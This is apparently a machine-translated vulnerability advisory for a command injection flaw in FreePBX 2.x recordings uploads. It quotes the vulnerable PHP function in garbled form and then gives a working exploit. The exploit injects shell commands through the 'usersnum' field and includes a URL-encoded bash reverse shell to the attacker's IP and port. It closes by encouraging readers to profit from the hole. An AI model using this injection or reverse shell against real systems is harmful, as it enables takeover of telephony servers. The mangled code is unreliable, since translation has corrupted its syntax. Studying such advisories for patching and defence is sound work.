FreePBX 'usersnum' Parameter Remote Command Execution Vulnerability

Release date:
Updated on:

Affected Systems:
FreePBX 2.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65756

FreePBX is an open source Web PBX solution.

FreePBX 2.x and other versions have the remote command execution vulnerability. Attackers can exploit this vulnerability to execute arbitrary commands in the context of the affected application.

<* Source: I-Hmx (n0p1337@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Vulnerable function "recording_addpage "@
Admin/modules/recordings/page. recordings. php

Function recording_addpage ($ usersnum ){
Global $ fc_save;
Global $ fc_check;
Global $ recordings_save_path;

?>
<Div class = "content">
<H2> <? Php echo _ ("System Recordings")?> </H2>
<H3> <? Php echo _ ("Add Recording")?> </H3>
<H5> <? Php echo _ ("Step 1: Record or upload")?> </H5>
<? Php if (! Empty ($ usersnum )){
Echo '<p> ';
Echo _ ("Using your phone,"). "<a href = \" # \ "class = \" info \ "> "._("
Dial ")." & nbsp; ". $ fc_save." <span> ";
Echo _ ("Start speaking at the tone. Press # when
Finished. ")." </span> </a> ";
Echo _ ("and speak the message you wish to record. Press # when
Finished. ")." \ n ";
Echo '</p> ';
} Else {?>
<Form name = "xtnprompt" action = "<? Php $ _ SERVER ['php _ SELF ']?> "
Method = "post">
<Input type = "hidden" name = "display" value = "recordings">
<? Php
Echo _ ("If you wish to make and verify recordings from your phone,
Please enter your extension number here: ") ;?>
<Input type = "text" size = "6" name = "usersnum" tabindex = "<? Php echo
+ + $ Tabindex;?> "> <Input name =" Submit "type =" submit "value =" <? Php echo
_ ("Go");?> "Tabindex =" <? Php echo ++ $ tabindex;?> ">
</Form>
<? Php }?>
<P> </p>
<Form enctype = "multipart/form-data" name = "upload" action = "<? Php echo
$ _ SERVER ['php _ SELF ']?> "Method =" POST ">
<? Php echo _ ("Alternatively, upload a recording in any supported
Asterisk format. Note that if you're using. wav, (eg, recorded
Microsoft Recorder) the file <B> must </B> be PCM Encoded, 16 Bits,
8000Hz ")?> : <Br>
<Input type = "hidden" name = "display" value = "recordings">
<Input type = "hidden" name = "action" value = "recordings_start">
<Input type = "hidden" name = "usersnum" value = "<? Php echo
$ Usersnum?> ">
<Input type = "file" name = "ivrfile" tabindex = "<? Php echo
+ + $ Tabindex;?> "/>
<Input type = "button" value = "<? Php echo _ ("Upload")?> "
Onclick = "document. upload. submit (upload); alert ('<? Php echo
Addslashes (_ ("Please wait until the page reloads.")?> '); "Tabindex =" <? Php
Echo ++ $ tabindex;?> "/>
</Form>
<? Php
If (isset ($ _ FILES ['ivrfile '] ['tmp _ name']) &
Is_uploaded_file ($ _ FILES ['ivrfile '] ['tmp _ name']) {
If (empty ($ usersnum) |! Ctype_digit ($ usersnum )){
$ Dest = "unnumbered -";
} Else {
$ Dest = "{$ usersnum }-";
}
$ Suffix =
Preg_replace ('/[^ 0-9a-zA-Z]/', '', substr (strrchr ($ _ FILES ['ivrfile '] ['name'],
"."), 1 ));
$ Destfilename = $ recordings_save_path. $ dest. "ivrrecording.". $ suffix;
Move_uploaded_file ($ _ FILES ['ivrfile '] ['tmp _ name'], $ destfilename );
System ("chgrp". $ amp_conf ['ampasteriskgroup']. "".
$ Destfilename );
System ("chmod g + rw". $ destfilename );
Echo "". $ _ FILES ['ivrfile '] ['name']." $ Rname = rtrim (basename ($ _ FILES ['ivrfile '] ['name'], $ suffix ),'.');
}?>
<Form name = "prompt" action = "<? Php $ _ SERVER ['php _ SELF ']?> "
Method = "post" onsubmit = "return rec_onsubmit ();">
<Input type = "hidden" name = "action" value = "recorded">
<Input type = "hidden" name = "display" value = "recordings">
<Input type = "hidden" name = "usersnum" value = "<? Php echo $ usersnum?> ">
<? Php
If (! Empty ($ usersnum) {?>
<H5> <? Php echo _ ("Step 2: Verify")?> </H5>
<P> <? Php echo _ ("After recording or
Uploading ,"). "& nbsp; <em> ". _ ("dial "). "& nbsp ;". $ fc_check. "</em> ". _ ("
Listen to your recording. ")?> </P>
<P> <? Php echo _ ("If you wish to re-record your message,
Dial ")." & nbsp; ". $ fc_save;?> </P>
<H5> <? Php echo _ ("Step 3: Name")?> </H5> <? Php
} Else {
Echo "}?>
<Table style = "text-align: right;">
<Tr valign = "top">
<Td valign = "top"> <? Php echo _ ("Name this Recording")?> : </Td>
<Td style = "text-align: left"> <input type = "text" name = "rname"
Value = "<? Php echo $ rname;?> "Tabindex =" <? Php echo ++ $ tabindex;?> "> </Td>
</Tr>
</Table>

<H6> <? Php
Echo _ ("Click \" SAVE \ "when you are satisfied with your recording ");
Echo "<input type = \" hidden \ "name = \" suffix \ "value = \" $ suffix \ "> \ n";?>
<Input name = "Submit" type = "submit" value = "<? Php echo _ ("Save")?> "
Tabindex = "<? Php echo ++ $ tabindex;?> "> </H6>
<? Php recordings_form_jscript ();?>
</Form>
</Div>
<? Php
}

Actually as you can see there are already exploitable lines there, but here
Am interested about this line
System ("chmod g + rw". $ destfilename );
If you traced the function flow you will notice that 'destfilename' get
Part of his value from the parameter $ _ REQUEST ['usersnum']
The function is called
Target/admin/config. php? Type = setup & display = recordings
Before uploading open firebug
Search for usersnum
Edit value
Fa; id> faris; fax
Or, for backconnetion use
Fa; bash % 20-i % 20% 3E % 26% 2 fdev % 2 ftcp % 2f192. 168.56.1% 2f1337% 20% 3E % 200%; faris
And you are ready to dominate, or even make some $ if you r interested ;)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

FreePBX
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://freepbx.org/trac